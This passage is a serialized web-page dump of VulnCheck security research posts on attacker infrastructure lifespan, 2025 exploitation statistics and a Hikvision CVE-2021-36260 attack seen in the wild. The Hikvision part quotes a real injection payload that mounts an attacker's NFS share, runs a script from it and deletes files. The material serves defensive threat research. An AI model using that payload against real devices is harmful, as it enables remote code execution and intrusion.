For offensive tooling, such as ",[47,36966,36822],{"href":36967,"rel":36968},"https:\u002F\u002Fwww.cobaltstrike.com\u002F",[51],[47,36970,36837],{"href":36971,"rel":36972},"https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fsliver",[51],[47,36974,36881],{"href":36975,"rel":36976},"https:\u002F\u002Fgithub.com\u002FHavocFramework\u002FHavoc",[51],[47,36978,36896],{"href":36979,"rel":36980},"https:\u002F\u002Fgithub.com\u002Fits-a-feature\u002FMythic",[51],", a median lifespan of about a week makes operational sense. These frameworks are typically spun up temporarily by red teams or APT groups, then torn down when the operation ends or transitions to a new stage.",[18,36983,36984,36985,36989],{},"A surprising outlier among offensive tools is ",[47,36986,36911],{"href":36987,"rel":36988},"https:\u002F\u002Fdocs.metasploit.com\u002Fdocs\u002Fusing-metasploit\u002Fbasics\u002Fhow-to-use-a-reverse-shell-in-metasploit.html#on-this-page",[51],". (Note: our dataset distinguishes \"Metasploit\" as the web-based UI, while \"msfconsole\" refers to active exploit listeners.) msfconsole sessions are usually short-lived—just seconds or minutes when used for single-shot exploitation. So, when we observe long durations, like the 22.5-day median above, it likely reflects client-based attacks (e.g., phishing or malicious documents) that require the listener to remain active indefinitely, or broad internet-wide scanning efforts.",[18,36991,36992,36993,982,36997,37001,37002,982,37005,37008,37009,37011,37012,982,37015,37018],{},"Long durations for ",[47,36994,36852],{"href":36995,"rel":36996},"https:\u002F\u002Fdocs.rapid7.com\u002Fmetasploit\u002Fmetasploit-web-interface-overview\u002F",[51],[47,36998,36806],{"href":36999,"rel":37000},"https:\u002F\u002Fgetgophish.com\u002F",[51]," are less surprising, as we’re tracking their web interfaces. These likely include testing setups or production instances deployed by legitimate security teams, systems that simply don't move much. 
This is supported by domain names like ",[886,37003,37004],{},"gophish.secopan[.]de",[886,37006,37007],{},"gophish.dev.apollosecure[.]com",".\nThat said, real-world attackers do use GoPhish",[1373,37010,34237],{},", and our dataset includes domains like ",[886,37013,37014],{},"mlcrosoft[.]in",[886,37016,37017],{},"githuh[.]fr",". Fortunately, many of these are eventually picked up and blocked by Spamhaus, although we observed a significant delay between our first sighting and Spamhaus enforcement.",[18,37020,37021],{},[68,37022],{":width":10862,"alt":37023,"src":37024},"SpamHaus GoPhish block notice","\u002Fblog\u002Fstillup-stillevil\u002Fspamhaus.png",[18,37026,37027],{},"Starkiller, the GUI front-end for PowerShell Empire, might also fall into this mixed-use category. However, its 10-day median duration aligns more closely with frameworks like Cobalt Strike and Sliver, suggesting it's more often used for hands-on-keyboard activity.",[18,37029,37030,37031,37034,37035,37038],{},"The final entry worth highlighting is the Confluence ",[47,37032,22194],{"href":22192,"rel":37033},[51]," Loader, an in-memory webshell that we documented in ",[47,37036,22211],{"href":22207,"rel":37037},[51],", published approximately 16 months ago. Its continued presence is a reminder that n-day vulnerabilities, even well-documented ones, can persist long after initial disclosure.",[18,37040,37041],{},[68,37042],{":width":10862,"alt":37043,"src":37044},"Confluence Godzilla Loader in the wild","\u002Fblog\u002Fstillup-stillevil\u002Fgodzilla-loader.png",[1920,37046,37048],{"id":37047},"attacker-oriented-proxy-longevity","Attacker-Oriented Proxy Longevity",[18,37050,37051,37052,37057,37058,1246,37063,1246,37068,37073,37074,37079,37080,982,37085,37090],{},"We track a wide array of proxies, but there is a subset we classify as attack-oriented due to their popularity among APTs or their design for offensive operations. 
For example, ",[47,37053,37056],{"href":37054,"rel":37055},"https:\u002F\u002Fgithub.com\u002FSoftEtherVPN\u002FSoftEtherVPN",[51],"SoftEther"," has been linked to ",[47,37059,37062],{"href":37060,"rel":37061},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fflax%20typhoon",[51],"Flax Typhoon",[47,37064,37067],{"href":37065,"rel":37066},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FEarth%20Krahang",[51],"Earth Krahang",[47,37069,37072],{"href":37070,"rel":37071},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FToddyCat",[51],"ToddyCat",", and others, while ",[47,37075,37078],{"href":37076,"rel":37077},"https:\u002F\u002Fgithub.com\u002Ffatedier\u002Ffrp",[51],"Fast Reverse Proxy"," (frp) is used by groups like ",[47,37081,37084],{"href":37082,"rel":37083},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FVolt%20Typhoon",[51],"Volt Typhoon",[47,37086,37089],{"href":37087,"rel":37088},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002FAPT35",[51],"APT35",". 
These tools often form the backbone of covert channels or post-exploitation pivots, and are treated as critical infrastructure by operators.",[18,37092,37093],{},"Focusing again on domain-associated instances, our top three attack-oriented proxies were:",[307,37095,37096,37110],{},[310,37097,37098],{},[313,37099,37100,37102,37104,37106,37108],{},[316,37101,36787],{},[316,37103,36790],{},[316,37105,36793],{},[316,37107,36796],{},[316,37109,36799],{},[336,37111,37112,37126,37141],{},[313,37113,37114,37116,37119,37121,37123],{},[341,37115,37056],{},[341,37117,37118],{},"25833",[341,37120,12467],{},[341,37122,36814],{},[341,37124,37125],{},"59 days",[313,37127,37128,37131,37134,37136,37138],{},[341,37129,37130],{},"GOST",[341,37132,37133],{},"1633",[341,37135,12467],{},[341,37137,36814],{},[341,37139,37140],{},"48 days",[313,37142,37143,37146,37149,37151,37153],{},[341,37144,37145],{},"FRP Dashboard",[341,37147,37148],{},"21",[341,37150,12467],{},[341,37152,36814],{},[341,37154,37155],{},"12 days",[18,37157,37158,37159,37163,37164,59],{},"The median durations of SoftEther and ",[47,37160,37130],{"href":37161,"rel":37162},"https:\u002F\u002Fgithub.com\u002Fgo-gost\u002Fgost",[51]," reflect what we typically expect from long-lived attacker infrastructure. In contrast, the FRP dashboard, a web interface for FRP, had a much shorter median lifespan of 12 days. This aligns with attacker behavior observed in the wild, where FRP is used to create temporary reverse proxy tunnels during targeted operations",[1373,37165,34289],{},[18,37167,37168],{},"For this analysis, we only included instances where the dashboard was exposed over a domain name, so the actual number of FRP deployments is likely higher. Even so, the short-lived nature of these dashboards suggests intentional churn. 
Attackers appear to spin up access points when needed, then quickly tear them down to avoid detection and reduce risk.",[1920,37170,37172],{"id":37171},"a-note-on-the-data","A Note On the Data",[18,37174,37175],{},"The infrastructure we track is largely misconfigured. Our visibility depends on factors like default TLS certificates, exposed web dashboards, unchanged landing pages, or services that simply shouldn’t be internet-facing. That means our dataset is inherently biased. We're likely missing the more disciplined attackers who know how to hide their infrastructure properly. There's no perfect fix for this, but it's worth calling out. The analysis here reflects what we can see, not necessarily the full picture.",[1920,37177,1903],{"id":1902},[18,37179,37180],{},"Attacker infrastructure doesn't always disappear quickly. Some tools, like Cobalt Strike and Sliver, are used briefly and torn down, but others, like GoPhish, SoftEther, and GOST, often stick around for months. Even when domains are publicly flagged or discussed, attackers appear to keep using these systems, presumably for long enough to achieve their goals. In the end, infrastructure lifespan depends on intent. Whether temporary or persistent, attackers are clearly comfortable leaving systems exposed longer than defenders might expect.",[1920,37182,202],{"id":201},[18,37184,37185,37186,1246,37191,1246,37196,1255,37201,59],{},"The VulnCheck team is always on the lookout for new and interesting attacker behavior. 
For more research like this, see our blogs ",[47,37187,37189],{"href":35913,"rel":37188},[51],[1131,37190,35917],{},[47,37192,37194],{"href":35920,"rel":37193},[51],[1131,37195,35924],{},[47,37197,37199],{"href":36635,"rel":37198},[51],[1131,37200,36637],{},[47,37202,37204],{"href":35927,"rel":37203},[51],[1131,37205,35931],{},[18,37207,33941,37208,33945,37211,1240,37214,1246,37217,1255,37220,1260],{},[47,37209,1233],{"href":10806,"rel":37210},[51],[47,37212,1239],{"href":1237,"rel":37213},[51],[47,37215,1245],{"href":1243,"rel":37216},[51],[47,37218,1251],{"href":1249,"rel":37219},[51],[47,37221,216],{"href":1258,"rel":37222},[51],[1920,37224,2850],{"id":2849},{"title":219,"searchDepth":220,"depth":220,"links":37226},[37227],{"id":36956,"depth":220,"text":36957},"2025-07-31","VulnCheck tracked thousands of attacker systems over a 90-day window to see how long malicious infrastructure really lasts. The results show that exposure doesn’t mean disruption, as many phishing kits, proxies, and C2 tools stay online for weeks or even months.",{"slug":37231},"stillup-stillevil","\u002Fblog\u002Fstillup-stillevil",{"title":36740,"description":37229},"blog\u002Fstillup-stillevil",[23275,26421],"ssgp84I__cixeEBTLHXly9OOSghZ7O4YA4bm6qApreQ",{"id":37238,"title":37239,"articles":37240,"authors":37284,"body":37286,"date":37244,"description":37562,"extension":234,"image":7,"link":7,"meta":37563,"navigation":237,"path":37565,"seo":37566,"series":7,"stem":37567,"subtype":7,"tags":37568,"__hash__":37569},"blog\u002Fblog\u002Fstate-of-exploitation-1h-2025.md","State of Exploitation - A look Into The 1H-2025 Vulnerability Exploitation & Threat Activity",[37241,37245,37248,37251,37255,37259,37264,37269,37273,37276,37281],{"title":37242,"source":19484,"link":37243,"date":37244},"Third of Exploited Vulnerabilities Weaponized Within a Day of 
Disclosure","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fthird-kev-exploited\u002F","2025-07-30",{"title":37246,"source":12182,"link":37247,"date":37228},"32% of exploited vulnerabilities are now zero-days or 1-days","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4031603\u002F32-of-exploited-vulnerabilities-are-now-zero-days-or-1-days.html",{"title":37249,"source":12153,"link":37250,"date":37228},"Accelerated vulnerability exploitation examined","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Faccelerated-vulnerability-exploitation-examined",{"title":37252,"source":12157,"link":37253,"date":37254},"Risky Bulletin: Russia spies on foreign embassies using local ISPs","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-russia-spies-on-foreign-embassies-using-local-isps\u002F","2025-08-01",{"title":37256,"source":14382,"link":37257,"date":37258},"Weekly Recap: VPN 0-Day, Encryption Backdoor, AI Malware, macOS Flaw, ATM Hack & More","https:\u002F\u002Fthehackernews.com\u002F2025\u002F08\u002Fweekly-recap-vpn-0-day-encryption.html","2025-08-04",{"title":37260,"source":37261,"link":37262,"date":37263},"Why defenders must act faster than ever to outpace vulnerability exploitation","Digitalisation World","https:\u002F\u002Fm.digitalisationworld.com\u002Fblogs\u002F58532\u002Fwhy-defenders-must-act-faster-than-ever-to-outpace-vulnerability-exploitation","2025-09-28",{"title":37265,"source":37266,"link":37267,"date":37268},"Threat actors are exploiting flaws more quickly -- here's what business leaders should do","IT Pro","https:\u002F\u002Fwww.itpro.com\u002Fsecurity\u002Fcyber-attacks\u002Fthreat-actors-exploiting-quickly-what-business-leaders-should-do","2025-10-21",{"title":37270,"source":19484,"link":37271,"date":37272},"Five Key Flaws Exploited in 2025's Major Software Supply Chain 
Incidents","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews-features\u002Ffive-flaws-exploited-2025-software\u002F","2025-12-29",{"title":37274,"source":25685,"link":37275,"date":23299},"Top 10 High-Risk Vulnerabilities Of 2025 that Exploited in the Wild","https:\u002F\u002Fcybersecuritynews.com\u002F10-high-risk-vulnerabilities-of-2025\u002F",{"title":37277,"source":37278,"link":37279,"date":37280},"The patching treadmill: Why traditional application security is no longer enough","ZDNet","https:\u002F\u002Fwww.zdnet.com\u002Farticle\u002Fthe-patching-treadmill-why-traditional-application-security-is-no-longer-enough\u002F","2026-05-11",{"title":37277,"source":37282,"link":37283,"date":2952},"Spiceworks","https:\u002F\u002Fwww.spiceworks.com\u002Fsecurity\u002Fthe-patching-treadmill-why-traditional-application-security-is-no-longer-enough\u002F",[37285],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":37287,"toc":37548},[37288,37293,37297,37300,37304,37324,37328,37333,37348,37352,37356,37359,37376,37379,37382,37399,37403,37409,37417,37426,37430,37433,37442,37446,37452,37455,37459,37464,37467,37471,37476,37479,37494,37503,37506,37510,37516,37519,37523,37526,37528,37531,37534,37537,37539,37541,37543],[18,37289,37290],{},[68,37291],{":width":10862,"alt":19511,"src":37292},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002F1h-2025-categories.png",[1920,37294,37296],{"id":37295},"a-look-into-1h-2025-vulnerability-exploitation","A look into 1H-2025 Vulnerability Exploitation",[18,37298,37299],{},"In the first half of 2025, VulnCheck identified 432 CVEs with evidence of exploitation in the wild for the first time. Known exploited vulnerabilities were disclosed by 82 distinct sources. We continue to see vulnerabilities being exploited at a fast pace with 32.1% of vulnerabilities being exploited on or before the day of the CVE disclosure, often representing zero-day exploitation. 
This demonstrates the need for defenders to move quickly on emerging threats while continuing to burn down their vulnerability debt.",[61,37301,37303],{"id":37302},"here-are-the-key-takeaways-from-our-analysis-and-coverage-of-known-exploited-vulnerabilities","Here are the key takeaways from our analysis and coverage of known exploited vulnerabilities",[22,37305,37306,37309,37312,37315,37318,37321],{},[25,37307,37308],{},"432 CVEs were reported as being exploited for the first time and added to VulnCheck KEV in 1H-2025",[25,37310,37311],{},"32.1% of KEVs had exploitation evidence on or before the day the CVE was issued, an increase from 23.6% in 2024.",[25,37313,37314],{},"Reported exploitation attributed to threat actors in China and North Korea decreased while exploitation attributed to Russia and Iran threat actors increased.",[25,37316,37317],{},"26.9% of KEVs first seen in the 1H-2025 were still awaiting analysis by NIST",[25,37319,37320],{},"While Open Source Software is impacted by a growing number of exploited vulnerabilities, our research shows that proprietary software such as CMS platforms and plug-ins, network edge devices, and server software are larger contributors to mass exploitation - not necessarily open source software.",[25,37322,37323],{},"147 of 181 unique CVEs that were used by known threat actors\nhad evidence of exploitation prior to 2025, demonstrating that threat actor exploitation disclosure often lags behind disclosure of initial exploitation evidence.",[61,37325,37327],{"id":37326},"how-quickly-are-vulnerabilities-being-exploited","How Quickly are Vulnerabilities Being Exploited?",[18,37329,37330],{},[68,37331],{":width":10862,"alt":19511,"src":37332},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002F1H-2025-speed.png",[18,37334,37335,37336,37341,37342,37347],{},"When we examine the time from CVE disclosure to exploitation evidence, we gain a better understanding of how quickly vulnerabilities are being exploited. 
We observed an 8.5 percentage point increase in the share of KEVs that had exploitation evidence disclosed on or before the day a CVE was published (32.1% in 1H-2025 as compared to the ",[47,37337,37340],{"href":37338,"rel":37339},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002F2024-exploitation-trends#how-quickly-are-vulnerabilities-being-exploited",[51],"23.6% we reported in 2024","). There are several nuances to consider. Additional evidence sourced from 2024 has increased this percentage over time, which is more aligned with what we are seeing in the 1H-2025. In addition, VulnCheck also issued ",[47,37343,37346],{"href":37344,"rel":37345},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fkev-expansion-2025",[51],"32+ CVEs"," for vulnerabilities after auditing Shadowserver in June, where there was evidence of exploitation but no CVE had been assigned, as we work to provide broader visibility for defenders through our contributions to the CVE program as a CVE numbering authority.",[61,37349,37351],{"id":37350},"exploring-categories-and-technologies","Exploring Categories and Technologies",[18,37353,37354],{},[68,37355],{":width":10862,"alt":19511,"src":37292},[18,37357,37358],{},"Five KEV categories continue to top the list for the 1H-2025, including:",[22,37360,37361,37364,37367,37370,37373],{},[25,37362,37363],{},"Content Management Systems (86) - A significant volume of this can be attributed to WordPress plug-ins 🙄",[25,37365,37366],{},"Network Edge Devices (77)",[25,37368,37369],{},"Server Software (61)",[25,37371,37372],{},"Open Source Software (55)",[25,37374,37375],{},"Operating Systems (38)",[18,37377,37378],{},"The Hardware category had a notable increase in KEVs as VulnCheck issued CVEs for several vulnerabilities targeting camera systems, DVRs, and IP phones, among other hardware devices, where exploitation evidence had been identified by Shadowserver.",[18,37380,37381],{},"Vendors with the highest number of KEVs in the 1H-2025 
included:",[22,37383,37384,37387,37390,37393,37396],{},[25,37385,37386],{},"Microsoft (32) - it’s worth noting that 26 of these KEVs are for Windows.",[25,37388,37389],{},"Cisco (10) - several are older vulnerabilities across multiple product lines.",[25,37391,37392],{},"Apple OS (6)",[25,37394,37395],{},"Totolink Networking Devices (6)",[25,37397,37398],{},"VMware (6)",[61,37400,37402],{"id":37401},"which-source-first-reported-exploitation","Which source first reported exploitation?",[18,37404,37405],{},[68,37406],{":width":10862,"alt":37407,"src":37408},"1H-2025 Earliest Reporter","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fearliest-reporter.png",[18,37410,37411,37412,59],{},"Evidence of exploitation for the 432 KEVs added to VulnCheck was first observed across more than 74 unique sources, highlighting the importance of having broad source coverage to ensure the earliest detection of exploitation. A comparison can be made with the ",[47,37413,37416],{"href":37414,"rel":37415},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fstate-of-exploitation-1h-2024#first-source-to-disclose-known-exploitation",[51],"1H-2024 state of exploitation report",[18,37418,37419,37420,37425],{},"VulnCheck KEV focuses on monitoring more than 500 sources for exploitation evidence and delivers machine-readable access and ",[47,37421,37424],{"href":37422,"rel":37423},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulncheck-kev-alerts",[51],"Slack\u002Femail alerting"," to ensure defenders are aware of exploited vulnerabilities as early as possible.",[61,37427,37429],{"id":37428},"exploring-threat-actor-attribution","Exploring Threat Actor Attribution",[18,37431,37432],{},"During 1H-2025, we analyzed and aggregated data from 139 unique industry reports that attributed vulnerability exploitation to threat actors. We identified 181 unique CVEs that were mentioned as being used by one of 92 named threat actors. 
Of the 181 CVEs, 147 had evidence of exploitation prior to 2025, demonstrating that threat actor exploitation disclosure often lags behind disclosure of initial exploitation evidence.",[18,37434,37435,37436,37441],{},"In February, we took a deep dive into the ",[47,37437,37440],{"href":37438,"rel":37439},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fblack-basta-chats",[51],"Black Basta chat logs",", which offer a more detailed examination of attribution and targeting for an individual threat actor.",[61,37443,37445],{"id":37444},"what-countries-were-most-commonly-attributed-to-threat-actors-in-the-1h-2025","What countries were most commonly attributed to threat actors in the 1H-2025?",[18,37447,37448],{},[68,37449],{":width":10862,"alt":37450,"src":37451},"Threat Actor Country","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-country.png",[18,37453,37454],{},"During 1H-2025, 92 unique threat actors were referenced across industry reports, of which 56 (60.8%) have an attributed country. If we look at the threat actors by attributed country, we quickly see that the usual suspects – China (20), Russia (11), North Korea (9), and Iran (6) – have the largest number of active threat actor groups. These countries are known for their cyber espionage and cyber activities, often being referred to as the four horsemen.",[61,37456,37458],{"id":37457},"what-does-vulnerability-attribution-reported-across-all-threat-actors-in-the-1h-2025-look-like","What does vulnerability attribution reported across all threat actors in the 1H-2025 look like?",[18,37460,37461],{},[68,37462],{":width":10862,"alt":37450,"src":37463},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-attribution.png",[18,37465,37466],{},"The following chart provides insight into attribution of unique vulnerabilities to threat actors. 
It lists each threat actor (normalized across the many aliases in use), the actor's attributed country where one exists, and the number of unique CVEs attributed to that actor in reports during the 1H-2025.",[61,37468,37470],{"id":37469},"what-nation-states-appear-to-be-the-most-active","What nation states appear to be the most active?",[18,37472,37473],{},[68,37474],{":width":10862,"alt":37450,"src":37475},"\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fthreat-actor-activity.png",[18,37477,37478],{},"To provide some insight into which nation states appear to be the most relevant, we explored the number of times a known exploited vulnerability was attributable to the four horsemen (China, Russia, North Korea and Iran). During the 1H-2025, we observed a drop in reports of KEVs associated with China and North Korea while we saw an increase in reports of exploited vulnerabilities associated with Russia and Iran.",[18,37480,37481,37482,37487,37488,37493],{},"The spikes in the 2H-2024 and subsequent drops associated with China and North Korea can largely be attributed to the release of two government reports in the 2H-2024: ",[47,37483,37486],{"href":37484,"rel":37485},"https:\u002F\u002Fmedia.defense.gov\u002F2024\u002FSep\u002F18\u002F2003547016\u002F-1\u002F-1\u002F0\u002FCSA-PRC-LINKED-ACTORS-BOTNET.PDF",[51],"People’s Republic of China-Linked Actors Compromise Routers and IoT Devices for Botnet Operations",", which attributed 66 KEVs to the Chinese threat actor Flax Typhoon (AKA Ethereal Panda), and ",[47,37489,37492],{"href":37490,"rel":37491},"https:\u002F\u002Fwww.cisa.gov\u002Fsites\u002Fdefault\u002Ffiles\u002F2024-07\u002Faa24-207a-dprk-cyber-group-conducts-global-espionage-campaign.pdf",[51],"North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs",", which attributed 44 KEVs to Silent Chollima.",[18,37495,37496,37497,37502],{},"Similarly, the 1H-2025 increase in Iran attribution 
appears largely tied to the ",[47,37498,37501],{"href":37499,"rel":37500},"https:\u002F\u002Fwww.tenable.com\u002Fblog\u002Ffrequently-asked-questions-about-iranian-cyber-operations",[51],"Frequently Asked Questions About Iranian Cyber Operations"," research released by Tenable, which attributes 29 KEVs to Iranian threat actors.",[18,37504,37505],{},"The spike in Russian attribution isn’t tied to specific reports; attribution is broadly distributed across sources, which re-emphasizes that Russia continues to be a major force behind threat activity and vulnerability exploitation.",[61,37507,37509],{"id":37508},"how-has-nist-nvd-performed-for-known-exploited-vulnerabilities","How Has NIST NVD Performed for Known Exploited Vulnerabilities",[18,37511,37512],{},[68,37513],{":width":10862,"alt":37514,"src":37515},"NIST NVD","\u002Fblog\u002Fstate-of-exploitation-1h-2025\u002Fnvd-1H-2025.png",[18,37517,37518],{},"When we look at NIST NVD as an enrichment source for CVE records, we see that 26.9% of KEVs first seen in the 1H-2025 were still awaiting analysis by NIST. Additionally, 4.4% of the KEVs are in a deferred status, meaning they are no longer maintained or updated by NIST. This highlights the continued resourcing challenges at NIST NVD since it lost funding in February 2024.",[61,37520,37522],{"id":37521},"summary-of-vulncheck-1h-2025-exploit-intelligence-report","Summary of VulnCheck 1H-2025 Exploit Intelligence Report",[18,37524,37525],{},"The first half of 2025 highlights how quickly vulnerabilities are weaponized and the growing sophistication of global threat actors. With over 430 new KEVs, persistence in what appears to be zero-day exploitation, and shifting nation-state activity, defenders face an increasingly compressed timeline for response. 
Continued focus on timely vulnerability management, proactive intelligence, and broad exploitation monitoring remains essential to staying ahead of adversaries.",[61,37527,19715],{"id":19714},[18,37529,37530],{},"[1] VulnCheck onboarded CrowdSec as a new intel source for KEVs prior to this report's cut-off, resulting in a significant contribution to the volume of KEVs reported.",[18,37532,37533],{},"[2] VulnCheck generated CVEs for 30+ vulnerabilities with exploitation activity in Shadowserver that did not previously have a CVE, which contributed to volume and speed increases.",[18,37535,37536],{},"[3] For threat actor attribution, we are using publicly reported instances of attribution, which are likely to carry some level of bias.",[61,37538,202],{"id":201},[18,37540,205],{},[18,37542,208],{},[18,37544,211,37545,217],{},[47,37546,216],{"href":214,"rel":37547},[51],{"title":219,"searchDepth":220,"depth":220,"links":37549},[37550,37551,37552,37553,37554,37555,37556,37557,37558,37559,37560,37561],{"id":37302,"depth":220,"text":37303},{"id":37326,"depth":220,"text":37327},{"id":37350,"depth":220,"text":37351},{"id":37401,"depth":220,"text":37402},{"id":37428,"depth":220,"text":37429},{"id":37444,"depth":220,"text":37445},{"id":37457,"depth":220,"text":37458},{"id":37469,"depth":220,"text":37470},{"id":37508,"depth":220,"text":37509},{"id":37521,"depth":220,"text":37522},{"id":19714,"depth":220,"text":19715},{"id":201,"depth":220,"text":202},"A Look into the Last 6-months of Vulnerability Exploitation… January-June 
2025",{"slug":37564},"state-of-exploitation-1h-2025","\u002Fblog\u002Fstate-of-exploitation-1h-2025",{"title":37239,"description":37562},"blog\u002Fstate-of-exploitation-1h-2025",[1280,1279],"VpZD-43r36Lf_efzVoCdtiMT2-dslGjZjlKY9fdz9qQ",{"id":37571,"title":35917,"articles":7,"authors":37572,"body":37574,"date":39548,"description":39549,"extension":234,"image":7,"link":7,"meta":39550,"navigation":237,"path":39552,"seo":39553,"series":7,"stem":39554,"subtype":7,"tags":39555,"__hash__":39556},"blog\u002Fblog\u002Fhikvision-mount-shell.md",[37573],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":37575,"toc":39542},[37576,37579,37581,37600,37606,37636,37643,37649,37697,37704,37713,37738,37748,37754,37779,37782,37788,37791,37795,37818,38819,38822,38833,38853,38859,38868,38871,38886,38892,39193,39201,39205,39212,39215,39221,39235,39241,39248,39261,39267,39271,39277,39297,39300,39304,39309,39313,39330,39334,39356,39358,39374,39388,39390,39392,39539],[263,37577],{":list":37578,"ico":266,"title":20},"[\"VulnCheck observed an attacker in the wild using `mount` as a “download and execute” GTFOBin while attempting to exploit Hikvision CVE-2021-36260.\",\"This novel use of `mount` was added to the binary dropper payloads in VulnCheck’s go-exploit framework.\",\"VulnCheck provides infrastructure details related to the attacker’s activity.\"]",[1920,37580,11648],{"id":11647},[18,37582,37583,37588,37589,37592,37593,37595,37596,37599],{},[47,37584,37587],{"href":37585,"rel":37586},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-36260",[51],"CVE-2021-36260"," is still ",[1131,37590,37591],{},"very"," viable. 
Shodan shows over one million potentially vulnerable internet-facing targets",[47,37594,467],{"href":36220},", many with ",[886,37597,37598],{},"Last-Modified"," headers dating back to the last decade.",[18,37601,37602],{},[68,37603],{":width":10862,"alt":37604,"src":37605},"Hikvision systems on Shodan","\u002Fblog\u002Fhikvision-mount-shell\u002Fhikvision-shodan.png",[18,37607,37608,37609,37612,37613,37615,37616,37620,982,37622,37627,37629,37630,37632,37633,37635],{},"These systems are ideal for internal pivots or building proxy networks, which makes it unsurprising that ",[47,37610,37587],{"href":37585,"rel":37611},[51]," regularly appears in joint cybersecurity advisories",[47,37614,353],{"href":36233}," and is associated with advanced threat actors like ",[47,37617,37062],{"href":37618,"rel":37619},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fethereal%20panda",[51],[47,37621,491],{"href":36482},[47,37623,37626],{"href":37624,"rel":37625},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Ffancy%20bear",[51],"Fancy Bear",[47,37628,380],{"href":36486},". The GreyNoise tag",[47,37631,401],{"href":36490}," is consistently active, and Shadowserver observes exploitation attempts daily",[47,37634,356],{"href":36536},". Shockingly (or not), attackers like useful systems.",[18,37637,37638,37639,37642],{},"Given all that, when our canaries are hit with ",[47,37640,37587],{"href":37585,"rel":37641},[51]," exploit attempts, it doesn’t exactly move the excitement needle. 
However, one recent attempt did catch our attention.",[18,37644,37645],{},[68,37646],{":width":10862,"alt":37647,"src":37648},"Hikvision exploit attempt in the wild","\u002Fblog\u002Fhikvision-mount-shell\u002Fexploit-attempt.png",[18,37650,37651,37654,37655,37658,37659,37662,37663,1246,37665,1246,37667,1255,37670,37673,37674,37677,37678,37682,37683,37686,37687,37690,37691,982,37693,37696],{},[47,37652,37587],{"href":37585,"rel":37653},[51]," is a command injection vulnerability affecting the ",[886,37656,37657],{},"\u002FSDK\u002FwebLanguage"," endpoint. Typically, attackers will use this endpoint to drop a malicious binary and execute it. However, this Hikvision system doesn’t have any of the classic GTFOBins",[47,37660,423],{"href":37661},"#user-content-fn-7"," to download a remote file (e.g. ",[886,37664,1557],{},[886,37666,1553],{},[886,37668,37669],{},"tftp",[886,37671,37672],{},"openssl"," are all missing. ",[886,37675,37676],{},"scp"," is broken). Attackers need to be creative. Metasploit",[47,37679,37681],{"href":37680},"#user-content-fn-8","8"," uses ",[886,37684,37685],{},"printf"," to write the Meterpreter stager to disk in 20ish byte chunks (each exploit attempt must fit within a 26 byte buffer), which is quite slow. VulnCheck’s ",[47,37688,1245],{"href":1243,"rel":37689},[51]," implementation sidesteps this issue by dropping a shell script that creates a reverse shell using ",[886,37692,1055],{},[886,37694,37695],{},"mknod",", but that’s hardly as powerful as Meterpreter.",[18,37698,37699,37700,37703],{},"All that is to say, if you want to drop a binary by exploiting ",[47,37701,37587],{"href":37585,"rel":37702},[51]," then you have to do a little work. That is why we appreciated the attacker’s exploit attempt shown above. It used a technique we hadn’t seen before as an initial binary dropper. 
This attacker leveraged the command injection to mount a remote NFS share and executed a file off of it.",[1354,37705,37707],{"className":34366,"code":37706,"language":34368,"meta":219,"style":219},"$(mkdir b; mount -o intr,nolock,tcp,exec 87.121.84[.]34:\u002Fsrv\u002Fnfs\u002Fshared b; cd b; chmod 777 *;sh hik.sh;cd ..\u002F;rm -rf weblib\u002F;rm -rf b)\n",[886,37708,37709],{"__ignoreMap":219},[1373,37710,37711],{"class":1375,"line":1376},[1373,37712,37706],{"class":9383},[18,37714,37715,37716,37720,37721,37723,37724,37727,37728,37730,37731,37734,37735,59],{},"The official GTFOBin ",[47,37717,22271],{"href":37718,"rel":37719},"https:\u002F\u002Fgtfobins.github.io\u002F",[51]," doesn’t have a “file download” attribute for the ",[886,37722,16339],{}," binary",[47,37725,723],{"href":37726},"#user-content-fn-9","; it’s only documented as a privilege escalation GTFOBin, but it is useful in this new (maybe obvious) capacity. In the command above, the attacker tells ",[886,37729,16339],{}," to make the remote NFS share, ",[886,37732,37733],{},"\u002Fsrv\u002Fnfs\u002Fshared",", on 87.121.84[.]34 available locally as the directory ",[886,37736,37737],{},".\u002Fb",[18,37739,37740,37741,37743,37744,37747],{},"To do this, ",[886,37742,16339],{}," first contacts the remote port mapper",[47,37745,24698],{"href":37746},"#user-content-fn-10"," (tcp\u002F111 or udp\u002F111) to discover the NFS service port, then mounts the directory using NFS (tcp\u002F2049 by default).",[18,37749,37750],{},[68,37751],{":width":10862,"alt":37752,"src":37753},"Mount network flow","\u002Fblog\u002Fhikvision-mount-shell\u002Fmount-graph.png",[18,37755,37756,37757,37759,37760,37763,1554,37767,37770,37773,37774,982,37776,37778],{},"This technique neatly sidesteps the problem Metasploit has (creating a file by using ",[886,37758,37685],{}," in small chunks is very slow), and avoids relying on a reverse shell to drop a binary as our exploit does. 
